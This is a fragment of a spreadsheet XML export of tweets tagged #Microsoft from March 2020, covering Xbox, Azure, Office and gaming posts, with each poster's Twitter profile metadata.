#VideoGameCollection #Games #Gaming #Microsoft #Xbox #GrabbedByTheGhoulies #Rare #RareGameStudios #MicrosoftGameStudios @ Greensboro, North Carolina https://t.co/EkPFRzx9HF</t>
  </si>
  <si>
    <t>{'id': 111459761, 'id_str': '111459761', 'name': 'A. Wyeth Strickland', 'screen_name': 'MissThiccorita', 'location': 'Greensboro, NC', 'description': 'I am the nicest asshole in about a 5 mile radius', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 346, 'friends_count': 1305, 'listed_count': 8, 'created_at': 'Fri Feb 05 00:42:37 +0000 2010', 'favourites_count': 30660, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12463,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'http://pbs.twimg.com/profile_images/1188138013819310082/d5RZom_7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1188138013819310082/d5RZom_7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/111459761/1527956357', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:50:53 +0000 2020</t>
  </si>
  <si>
    <t>It has been a good day. Spend the day filming with a great role model of mine powered by Bloomberg @LivogStormsmor #Maersk #Microsoft #Bloomberg #transformwhileperform ngoziamobi https://t.co/V6mU4iS56Y</t>
  </si>
  <si>
    <t>{'id': 256880416, 'id_str': '256880416', 'name': 'Sidse Theill', 'screen_name': 'SisaSHN', 'location': 'Denmark', 'description': 'Views are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 121, 'listed_count': 2, 'created_at': 'Thu Feb 24 07:44:30 +0000 2011', 'favourites_count': 91, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 109,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'http://pbs.twimg.com/profile_images/1253114566/sisa_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1253114566/sisa_normal.JPG',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</si>
  <si>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16:49:28 +0000 2020</t>
  </si>
  <si>
    <t>#ShortVideoSeries
Understanding @wakelet in 4 simple steps, creating #wakeletwave.
https://t.co/dNCUSayjHb
#MicrosoftEDU #microsoft @MicrosoftEDU @JBDbiz @J4jammy
@MisbahGedal
@kyteijas @amit_nfu @annkozma723 #ICT4SDG #eLearning #BuildingTheFutureTogether #creativity
#SDGs https://t.co/FdiI5sAFSy</t>
  </si>
  <si>
    <t>Thu Mar 05 16:48:46 +0000 2020</t>
  </si>
  <si>
    <t>For those who enjoy seeing behind the scenes of my photos, here is a shot for this weekend.
@Halo 
@misplacedyank 
@WickedCoolToys 
@Slimkati3 
#halo
#xbox
#microsoft 
#halospotlight #haloreach #HALOINFINITE #HaloCE #behindthescenes #ThursdayMotivation 
#toyphotography https://t.co/LGask97neg</t>
  </si>
  <si>
    <t>{'id': 1188593600763969536, 'id_str': '1188593600763969536', 'name': 'Mooreshots', 'screen_name': 'Mooreshots1', 'location': 'Columbus, OH', 'description': 'Former Marine with a passion for toy photography. Halo is what Inspired me to get into the world of toy photography. Instagram is my main page ( mooreshots__ )', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 85, 'friends_count': 138, 'listed_count': 0, 'created_at': 'Sun Oct 27 23:09:42 +0000 2019', 'favourites_count': 706, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 535, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209206589837721600/klZo43gP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209206589837721600/klZo43gP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1188593600763969536/1582207194',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</si>
  <si>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16:47:42 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft offer free teleconferencing tools to combat #coronavirus  https://t.co/2s7V9GUlzN</t>
  </si>
  <si>
    <t>{'id': 2849714072, 'id_str': '2849714072', 'name': 'Calm down, Think different, Find your way ...', 'screen_name': 'Thinkism', 'location': 'Dubai', 'description': "Relationship &amp; Friendship\r\nnever Die by a Natural Death.\r\nThey R always Murdred by\r\nAttitude, Behaviour, Ego,\r\nHidden Benefits&amp; Ignorance. RT's not endorsement.", 'url': 'https://t.co/mWZCsqR5ot', 'entities': {'url': {'urls': [{'url': 'https://t.co/mWZCsqR5ot', 'expanded_url': 'http://mcaf.ee/o8ulm0?Kgsview', 'display_url': 'mcaf.ee/o8ulm0?Kgsview', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1765, 'friends_count': 29, 'listed_count': 59, 'created_at': 'Fri Oct 10 05:24:32 +0000 2014', 'favourites_count': 9660, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 31520,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'http://pbs.twimg.com/profile_images/700621307067510786/N3vpVgny_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/700621307067510786/N3vpVgny_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2849714072/1483076134',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</si>
  <si>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16:47:18 +0000 2020</t>
  </si>
  <si>
    <t>@CNET I have already migrated to #Microsoft To-Do. Feels like a like for like change. I dont miss #Wunderlist</t>
  </si>
  <si>
    <t>{'id': 27699256, 'id_str': '27699256', 'name': 'Taner Yildiz', 'screen_name': 'TanerYildiz', 'location': 'London / Istanbul / Chicago', 'description': 'Dad, Husband,Podcasting Enthusiast, Blogger, eternal Hotelier &amp; @utahjazz Fan. Blog: https://t.co/NrzQmQPe2j LinkedIn: https://t.co/6Ss64u5mrv', 'url': 'https://t.co/3KQ3b15XyT', 'entities': {'url': {'urls': [{'url': 'https://t.co/3KQ3b15XyT', 'expanded_url': 'http://bit.ly/taneryildiz-podcast', 'display_url': 'bit.ly/taneryildiz-poâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/NrzQmQPe2j', 'expanded_url': 'http://medium.com/@taneryildiz', 'display_url': 'medium.com/@taneryildiz', 'indices': [85, 108]}, {'url': 'https://t.co/6Ss64u5mrv', 'expanded_url': 'http://linkedin.com/in/taneryildiz', 'display_url': 'linkedin.com/in/taneryildiz', 'indices': [119, 142]}]}}, 'protected': False, 'followers_count': 359, 'friends_count': 178, 'listed_count': 5, 'created_at': 'Mon Mar 30 18:34:09 +0000 2009', 'favourites_count': 931, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1309, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223724249313173507/TChTQzvA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223724249313173507/TChTQzvA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27699256/1580594736',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</si>
  <si>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16:47:08 +0000 2020</t>
  </si>
  <si>
    <t>Biz as usual. #Microsoft 'news' rooting for the accused. The media outlet here (Daily Mail) has been hauled into court by #MeghanAndHarry for printing lies &amp;amp; for privacy breaches but MSN is happy to highlight its headlines. #strictlyfishwrap https://t.co/0vsAAIKPoy</t>
  </si>
  <si>
    <t>{'id': 532190964, 'id_str': '532190964', 'name': 'G Shettar', 'screen_name': 'GirijaShettar', 'location': 'London, England', 'description': 'I care. A lot. About a lot of things. Vedic culture &amp; philosophy lover. Energy healer and Tarot/Oracle enthusiast. Writer, journalist, actress.', 'url': 'https://t.co/8nw2XFEPN7', 'entities': {'url': {'urls': [{'url': 'https://t.co/8nw2XFEPN7', 'expanded_url': 'https://wordpress.com/view/scientificethicalrevolution.wordpress.com', 'display_url': 'wordpress.com/view/scientifiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1831, 'friends_count': 667, 'listed_count': 54, 'created_at': 'Wed Mar 21 10:16:57 +0000 2012', 'favourites_count': 539, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1539,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'http://pbs.twimg.com/profile_images/1208701535649181696/GzxCebUa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208701535649181696/GzxCebUa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/532190964/1572804680',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</si>
  <si>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16:45:14 +0000 2020</t>
  </si>
  <si>
    <t>How to Collaborate Better with #Microsoft #Outlook https://t.co/TCjwhB13bH</t>
  </si>
  <si>
    <t>{'id': 780730490, 'id_str': '780730490', 'name': 'Allen White - CMIT Solutions', 'screen_name': 'cmitsmnb', 'location': 'New Braunfels, TX', 'description': 'CMIT Solutions - Managed #IT and #Network #Security Services - https://t.co/kTWzqaruKE #HailState #NBTX #SMTX #ATX #SATX', 'url': 'https://t.co/z8hFehBHXj', 'entities': {'url': {'urls': [{'url': 'https://t.co/z8hFehBHXj', 'expanded_url': 'http://www.cmitsmnb.com', 'display_url': 'cmitsmnb.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/kTWzqaruKE', 'expanded_url': 'http://www.linkedin.com/in/allenrwhite', 'display_url': 'linkedin.com/in/allenrwhite', 'indices': [63, 86]}]}}, 'protected': False, 'followers_count': 1649, 'friends_count': 1500, 'listed_count': 124, 'created_at': 'Sat Aug 25 17:33:19 +0000 2012', 'favourites_count': 24936, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23199,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'http://pbs.twimg.com/profile_images/378800000013794763/b92ed4ac60a55f886548dfc95765c91c_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000013794763/b92ed4ac60a55f886548dfc95765c91c_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/780730490/1399406000',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</si>
  <si>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16:44:42 +0000 2020</t>
  </si>
  <si>
    <t>Binariks is delighted to share the news about our recently obtained Silver Microsoft competency. 
Find out more: https://t.co/URwjQtjfqq
#Microsoft #Silver_Application_Development #Certification</t>
  </si>
  <si>
    <t>{'id': 710971467723186176, 'id_str': '710971467723186176', 'name': 'Binariks Inc.', 'screen_name': 'Binariks', 'location': 'Lviv, Ukraine', 'description': 'Software development and consulting company, helping businesses achieve success by creating winning products and teams', 'url': 'https://t.co/PCLu1Uhyqi', 'entities': {'url': {'urls': [{'url': 'https://t.co/PCLu1Uhyqi', 'expanded_url': 'https://www.binariks.com/about/', 'display_url': 'binariks.com/about/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 648, 'friends_count': 1697, 'listed_count': 10, 'created_at': 'Fri Mar 18 23:29:41 +0000 2016', 'favourites_count': 104, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1108747394647244801/7lsKC8sC_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108747394647244801/7lsKC8sC_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/710971467723186176/1534890047',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</si>
  <si>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16:41:24 +0000 2020</t>
  </si>
  <si>
    <t>All your #Microsoft files, in one place together. Download the new #Office app: https://t.co/oK36cxsfPr https://t.co/sAnydNjgzx</t>
  </si>
  <si>
    <t>{'id': 94668474, 'id_str': '94668474', 'name': 'Devsys', 'screen_name': 'DevsysdeMexico', 'location': 'Mexico City', 'description': 'Empresa dedicada a soluciones de negocios de Microsoft: Dynamics 365, CRM, SL, AX, RMS, Sharepoint, Business Portal, Skype, Azure, ContÃ¡ctanos â˜Ž 52022251', 'url': 'https://t.co/u7T0ZPJ73v', 'entities': {'url': {'urls': [{'url': 'https://t.co/u7T0ZPJ73v', 'expanded_url': 'http://www.devsys.com.mx', 'display_url': 'devsys.com.mx', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1110, 'friends_count': 965, 'listed_count': 26, 'created_at': 'Fri Dec 04 23:13:48 +0000 2009', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3155,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'http://pbs.twimg.com/profile_images/1191415239948021761/_JaFV_7U_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191415239948021761/_JaFV_7U_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/94668474/1577974509', 'profile_link_color': '1B1464',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</si>
  <si>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16:40:36 +0000 2020</t>
  </si>
  <si>
    <t>S&amp;amp;D Double elim clutch up #gaming #Esports #gamers #sirusthevirus #tod0ubled #302 #215 #Callofduty #modernwarfare #xbox #xboxgaming #xboxlive #microsoft #elgato #logitech #samson #asus #kontrolfreek #nyc #citylights  https://t.co/WPjChTX9eT</t>
  </si>
  <si>
    <t>{'id': 717042484, 'id_str': '717042484', 'name': 'ToDoubleD', 'screen_name': 'sirusduhvirus', 'location': 'N. East Coast, USA', 'description': 'Single Dad/1Gamer/Highlights/Epic plays/Gaming Clips.I stream sumtimes@Twitch.tv/MixR\nSunlight=Disinfectant!\n#FuckSocialism!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 454, 'listed_count': 0, 'created_at': 'Wed Oct 16 02:51:40 +0000 2013', 'favourites_count': 944, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 703,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'http://pbs.twimg.com/profile_images/1206360398955515904/TqGA8twm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206360398955515904/TqGA8twm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/717042484/1382361394',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</si>
  <si>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16:36:09 +0000 2020</t>
  </si>
  <si>
    <t>Azure News:
NDv2-Series VMs are now Generally Available
NDv2 GPU VMs for high-end deep learning training and HPC workloads are going GA in East US, South Central US, and West Europe.
https://t.co/5d4E2WuXG4
#azure #microsoft</t>
  </si>
  <si>
    <t>{'id': 2352055110, 'id_str': '2352055110', 'name': 'Andreas Kilzer', 'screen_name': 'AndreasKpunkt', 'location': 'MÃ¼nchen, Bayern', 'description': 'automation anything enthusiast and cloud consultant at microsoft.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 225, 'listed_count': 0, 'created_at': 'Wed Feb 19 18:03:24 +0000 2014', 'favourites_count': 177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 253,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'http://pbs.twimg.com/profile_images/447416197626462208/EpT8twPK_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/447416197626462208/EpT8twPK_normal.jpeg',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</si>
  <si>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Azure News:
PowerShell 7.0 is now generally available
PowerShell 7.0, the next major release of PowerShell, is now available. This latest release makes PowerShell a truly cross-platform automation tool and configuration framework.
https://t.co/C4Fxbi7gUg
#azure #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 16:36:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure News:
Azure DevTest LabsSecurity alerts for lab environments
View Azure Security Center alerts for your Azure Resource Management environments deployed through the Azure DevTest Service. 
https://t.co/aRTlS24yxh
#azure #microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 16:35:04 +0000 2020</t>
  </si>
  <si>
    <t>/2
$449 = Strong start, higher than expected install base spike, compelling offer together with services shifts market paradigm 
While streaming and services are the future and #Microsoft is currently a clear favorite in that race within the gaming space, these
/3</t>
  </si>
  <si>
    <t>{'id': 4515289154, 'id_str': '4515289154', 'name': 'ðŸ¦… OGCryptor', 'screen_name': 'OGCryptor', 'location': 'Vancouver, BC ðŸ‡¨ðŸ‡¦ ', 'description': '(à² _à² ) Casually Hardcore Gaming Proctologist â™› Connoisseur of Digital Arts â™› Livestreaming Dreamer â™› Live and let Live', 'url': 'https://t.co/NudwZc3Dcl', 'entities': {'url': {'urls': [{'url': 'https://t.co/NudwZc3Dcl', 'expanded_url': 'https://mixer.com/OGCryptor', 'display_url': 'mixer.com/OGCryptor', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 268, 'friends_count': 88, 'listed_count': 13, 'created_at': 'Thu Dec 10 06:41:12 +0000 2015', 'favourites_count': 20771, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19871,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'http://pbs.twimg.com/profile_images/1224088758355550208/MwITsq5i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224088758355550208/MwITsq5i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4515289154/1581565430', 'profile_link_color': '107C10',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</si>
  <si>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16:35:00 +0000 2020</t>
  </si>
  <si>
    <t>#Gamers, is the #XBOXoneS still worth buying in the year 2020, as a #firstConsole? 
What are the benefits you find?
#Microsoft #XboxTeam  #games #videoGames #XboxSeriesX #XboxOne #Xbox</t>
  </si>
  <si>
    <t>{'id': 36354336, 'id_str': '36354336', 'name': 'Rayees Shaikh', 'screen_name': 'cuterais', 'location': '', 'description': 'Stories-Photography-Poetry.  Between Thoughts And The Sky', 'url': 'https://t.co/aBHcT1eDBP', 'entities': {'url': {'urls': [{'url': 'https://t.co/aBHcT1eDBP', 'expanded_url': 'http://www.rayeesshaikh.com', 'display_url': 'rayeesshaikh.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 260, 'friends_count': 326, 'listed_count': 0, 'created_at': 'Wed Apr 29 13:18:19 +0000 2009', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 356,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'http://pbs.twimg.com/profile_images/560533196735934464/D9e-5xTu_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/560533196735934464/D9e-5xTu_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36354336/1570819422',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</si>
  <si>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MONSTER HUNTER: WORLD - ICEBORNE MASTER EDITION [DELUXE]
Capcom - Xbox One
#Monsterhunter #capcom #xboxone #microsoft #playasia #affiliate #sale #weeklyspecial 
List price: US$ 91.99
Special price: US$ 19.99*
You save: US$ 72.00 (78%)
https://t.co/91oqoLe1Hb https://t.co/nnB3cGaIHr</t>
  </si>
  <si>
    <t>{'id': 322909493, 'id_str': '322909493', 'name': 'oprainfall', 'screen_name': 'oprainfall', 'location': '', 'description': 'Promotes awareness of critically acclaimed niche games and anime. *Some links shared are affiliate links" https://t.co/uMp64ucXEi', 'url': 'https://t.co/uhgNQtxILs', 'entities': {'url': {'urls': [{'url': 'https://t.co/uhgNQtxILs', 'expanded_url': 'http://operationrainfall.com', 'display_url': 'operationrainfall.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/uMp64ucXEi', 'expanded_url': 'https://www.subscribestar.com/oprainfall', 'display_url': 'subscribestar.com/oprainfall', 'indices': [106, 129]}]}}, 'protected': False, 'followers_count': 6449, 'friends_count': 442, 'listed_count': 166, 'created_at': 'Thu Jun 23 23:14:24 +0000 2011', 'favourites_count': 1827, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 30679,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'http://pbs.twimg.com/profile_images/700380192548585472/MGkaa2-h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/700380192548585472/MGkaa2-h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/322909493/1455818625',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</si>
  <si>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16:34:15 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Kubernetes #Service (AKS) is a managed container orchestration service, based on the open-source Kubernetes system, which is available on the #Microsoft Azure public cloud. An #organization can use AKS to deploy, scale and manage Docker containers...https://t.co/lsvrLEJMIR</t>
  </si>
  <si>
    <t>{'id': 2701647698, 'id_str': '2701647698', 'name': 'itechnects', 'screen_name': 'ITechNets', 'location': 'Pakistan Sialkot ', 'description': 'Learn with Ease', 'url': 'https://t.co/EybF3WMnu9', 'entities': {'url': {'urls': [{'url': 'https://t.co/EybF3WMnu9', 'expanded_url': 'http://www.itechnets.com', 'display_url': 'itechnets.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 209, 'listed_count': 0, 'created_at': 'Sat Aug 02 20:16:00 +0000 2014', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 123,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'http://pbs.twimg.com/profile_images/1212009747316183041/HF2KxLVt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212009747316183041/HF2KxLVt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2701647698/1577800530',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</si>
  <si>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16:31:57 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Kubernetes #Service (AKS) is a managed container orchestration service, based on the open-source Kubernetes system, which is available on the #Microsoft Azure public cloud. 
https://t.co/JVD3DYTbYG
#Kubernetes #containers #kubectl #OpenStack #AzureSQLDatabase #azuresky https://t.co/Q4Fyc8lXBI</t>
  </si>
  <si>
    <t>Thu Mar 05 16:30:23 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft reveals a new design for the #start #menu
https://t.co/l4RseHL8Rs</t>
  </si>
  <si>
    <t>{'id': 740091682251780096, 'id_str': '740091682251780096', 'name': 'Adlice', 'screen_name': 'AdliceSoftware', 'location': 'France', 'description': '#InfoSec / Software company. #RogueKiller owner. CEO @TigzyRK\nStatus: https://t.co/cFQdRVNIih', 'url': 'https://t.co/tZbUfHnRvg', 'entities': {'url': {'urls': [{'url': 'https://t.co/tZbUfHnRvg', 'expanded_url': 'http://adlice.com', 'display_url': 'adlice.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/cFQdRVNIih', 'expanded_url': 'https://uptime.statuscake.com/?TestID=fwx7201g80', 'display_url': 'uptime.statuscake.com/?TestID=fwx720â€¦', 'indices': [70, 93]}]}}, 'protected': False, 'followers_count': 841, 'friends_count': 2, 'listed_count': 22, 'created_at': 'Tue Jun 07 08:03:02 +0000 2016', 'favourites_count': 121, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5545,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'http://pbs.twimg.com/profile_images/1144153019942166528/B1rTNpTG_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1144153019942166528/B1rTNpTG_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/740091682251780096/1561622321',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</si>
  <si>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16:30:19 +0000 2020</t>
  </si>
  <si>
    <t>Double kill S&amp;amp;D #gaming #Esports #gamers #sirusthevirus #tod0ubled #302 #215 #Callofduty #modernwarfare #xbox #xboxgaming #xboxlive #microsoft #elgato #logitech #samson #asus #kontrolfreek #nyc #citylights https://t.co/6LSCFEN3MY</t>
  </si>
  <si>
    <t>Thu Mar 05 16:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Surf Game Hidden Easter Egg In New Chromium-Based We Browser Gets New Ninjacat Activated By Secret Konami Code
https://t.co/Kg0PQiMfCx
#news #tech #computer #game #live #chromium #chromiumedge #edge #iosgame #microsoft 
https://t.co/Kg0PQiMfCx</t>
  </si>
  <si>
    <t>{'id': 191044851, 'id_str': '191044851', 'name': 'RÃ¡dio do Role', 'screen_name': 'Radiorole', 'location': '', 'description': 'Contatos: x_Jefs@live.com / Radiorole@live.com - @S3MCU3C4', 'url': 'http://t.co/nn5tfknUSE', 'entities': {'url': {'urls': [{'url': 'http://t.co/nn5tfknUSE', 'expanded_url': 'http://radiorole.net/', 'display_url': 'radiorole.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 489, 'friends_count': 163, 'listed_count': 14, 'created_at': 'Wed Sep 15 13:45:19 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2486,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'http://pbs.twimg.com/profile_images/1365985952/Radiodorole_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1365985952/Radiodorole_normal.png', 'profile_link_color': '0071B3', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '4E72E6', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 16:29:10 +0000 2020</t>
  </si>
  <si>
    <t>Don't miss: Operators Face Unproven Edge Computing Business Models https://t.co/KdNoXmLJWC #5g #ai #amazonwebservices(aws) #breakingnews #cloud #edgecomputing #google #microsoft #nokianetworks</t>
  </si>
  <si>
    <t>Thu Mar 05 16:22:30 +0000 2020</t>
  </si>
  <si>
    <t>Interactive Yammer Emails in Outlook on the web are here! https://t.co/Pc1GDdWP8R #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 16:22:28 +0000 2020</t>
  </si>
  <si>
    <t>#AlchemyEducation
Get started with the #Microsoft #PowerBI gateway https://t.co/TcJnYzcYrH</t>
  </si>
  <si>
    <t>{'id': 3206849842, 'id_str': '3206849842', 'name': 'Eddie', 'screen_name': 'Red7Finance', 'location': 'Yorkshire, England, UK', 'description': 'None of us are getting out of here alive, walk in the sunshine, swim in the ocean. #Balance DYOR:VRS Ni XAU BTC HZM ORPH SKIN TLOU ACP BIDS ACB', 'url': 'https://t.co/00pf2y6TG4', 'entities': {'url': {'urls': [{'url': 'https://t.co/00pf2y6TG4', 'expanded_url': 'https://tinyurl.com/VersarienRNS', 'display_url': 'tinyurl.com/VersarienRNS', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 189, 'friends_count': 616, 'listed_count': 1, 'created_at': 'Sat Apr 25 17:04:34 +0000 2015', 'favourites_count': 5130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2479,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'http://pbs.twimg.com/profile_images/1134514666040909824/TZVxnWDi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134514666040909824/TZVxnWDi_normal.jpg',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</si>
  <si>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16:20:31 +0000 2020</t>
  </si>
  <si>
    <t>you better stop @Microsoft 
your stole our compeny from the beginning
and we will not take any more spreading thsese lies. you have been warned!
#Microsoft 
#Minecraft</t>
  </si>
  <si>
    <t>{'id': 1141056236739158016, 'id_str': '1141056236739158016', 'name': 'Linuxy', 'screen_name': 'Linuxy_', 'location': 'Australia', 'description': 'CEO of @Mojang, The Minecraft Company \nCEO of @PixalHost, A Google Company\n\n\nAlso a fan of @awonderland', 'url': 'https://t.co/vcSPN0H4yC', 'entities': {'url': {'urls': [{'url': 'https://t.co/vcSPN0H4yC', 'expanded_url': 'https://linuxydev.net', 'display_url': 'linuxydev.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21, 'friends_count': 70, 'listed_count': 2, 'created_at': 'Tue Jun 18 18:53:01 +0000 2019', 'favourites_count': 214, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1339,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'http://pbs.twimg.com/profile_images/1141058183915438080/fwxCtd5v_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141058183915438080/fwxCtd5v_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1141056236739158016/1572721785', 'profile_link_color': '0078FF',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</si>
  <si>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16:20:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Dynamics customization comes in different forms, but which one is right for your business? 
Find out: https://t.co/TWXwfvwe1n https://t.co/c22UazGzjL</t>
  </si>
  <si>
    <t>Thu Mar 05 16:20:13 +0000 2020</t>
  </si>
  <si>
    <t>Live show at #SecureITDay 2020 with @VaronisFR =&amp;gt; #Office365 attack via man in the middle! #Cybersecurity #Cloud #Microsoft #Phishing #MFA #MonacoDigital @MonacoDigital98 https://t.co/alshE5YEHO</t>
  </si>
  <si>
    <t>Thu Mar 05 16:19:30 +0000 2020</t>
  </si>
  <si>
    <t>From our #UAE #Azure meetup yesterday 
#mvpbuzz #Microsoft #AzureFamily #AzureSecurity #cybersecurity #Security #Sentinel #azuresentinel https://t.co/UBY1VXjWCg</t>
  </si>
  <si>
